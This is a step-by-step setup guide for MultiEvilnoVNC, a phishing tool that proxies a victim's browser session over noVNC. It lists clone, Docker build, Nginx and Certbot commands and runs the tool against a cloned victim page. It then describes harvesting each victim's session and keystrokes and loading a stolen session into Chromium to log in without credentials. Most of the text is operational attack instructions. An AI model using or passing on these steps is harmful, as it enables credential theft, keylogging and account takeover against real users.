Setting Up MultiEvilnoVNC with HTTPS

Application Logo

Introduction

In this guide, we are going to configure a tool called MultiEvilNoVNC. This tutorial will cover configuring Nginx, obtaining SSL certificates with Certbot, preparing Docker containers, and modifying the startup script to ensure proper functionality.

Requirements

Before you begin, make sure you have the following:

  1. A test domain (e.g. testdomain.com).
  2. Docker installed on your system.
  3. Certbot installed for obtaining SSL certificates.

Step 1: Preparing the Docker Containers

First, you must mount the Docker containers. This can be done in two ways:

Automatic Method:

git clone https://github.com/wanetty/MultiEvilnoVNC.git
cd EvilnoVNC
make build

Manual method:

git clone https://github.com/wanetty/MultiEvilnoVNC.git
cd EvilnoVNC
sudo chown -R 103 Downloads
sudo docker build -f evilnovnc.Dockerfile -t evilnovnc .
sudo docker build -f nginx.Dockerfile -t evilnginx .

Step 2: Configuring Nginx for HTTPS

Next, configure Nginx to handle HTTP and HTTPS requests. Create a configuration file in Files/default.conf with the following content:

server {
    listen       80;
    listen  [::]:80;
    server_name  testdomain.com;

    # Redirección de HTTP a HTTPS
    return 301 https://$server_name$request_uri;
}

server {
    listen       443 ssl http2;
    listen  [::]:443 ssl http2;
    server_name  testdomain.com;

    ssl_certificate /certs/fullchain.pem;
    ssl_certificate_key /certs/privkey.pem;

    # SSL settings
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_prefer_server_ciphers on;
    ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;

    access_log  /var/log/nginx/testdomain.access.log;
    error_log   /var/log/nginx/testdomain.error.log;

    location / {
        root   /usr/share/nginx/html;
        index  index.html index.htm;
    }

    location /reso {
        proxy_pass   http://127.0.0.1:8080;
    }
}

Step 3: Obtaining SSL Certificates

To secure HTTPS communication, you need to obtain SSL certificates. We will use Certbot for this purpose. Run the following command:

sudo certbot certonly --standalone --preferred-challenges http -d testdomain.com

Certificate files

Warning: You can obtain the certificates in another way if you prefer.

Step 4: Modifying the Startup Script

The startup script start_auto.sh needs to be modified to configure Docker and copy the certificates to the correct location. Below is an extract of the script with the modifications indicated in the image provided:

Modifications of start_auto.sh

Step 5: Execute the tool

Finally, run the tool using the following command:

./start_auto.sh https://clone.victim.page.com

After the execution

In the Downloads folder, you will find the sessions of the websites that have been visited by users. These sessions are identified by the same identifier as the website. In addition, within each session, there is a file called keylogger which contains the text written by the victim.

If you want to open the sessions in a browser, you can do so by copying the content of one of the sessions to your Chromium configuration as follows (replace SESSION_ID with the identifier of the session you want to open):

cp -R Downloads/SESSION_ID ~/.config/chromium/

Then, run Chromium with the following command:

/bin/bash -c "/usr/bin/chromium --no-sandbox --disable-crash-reporter --password-store=basic &" > /dev/null 2>&1 &

After that, open Chromium and navigate to the victim’s website. You should be able to log in without needing to enter a username and password.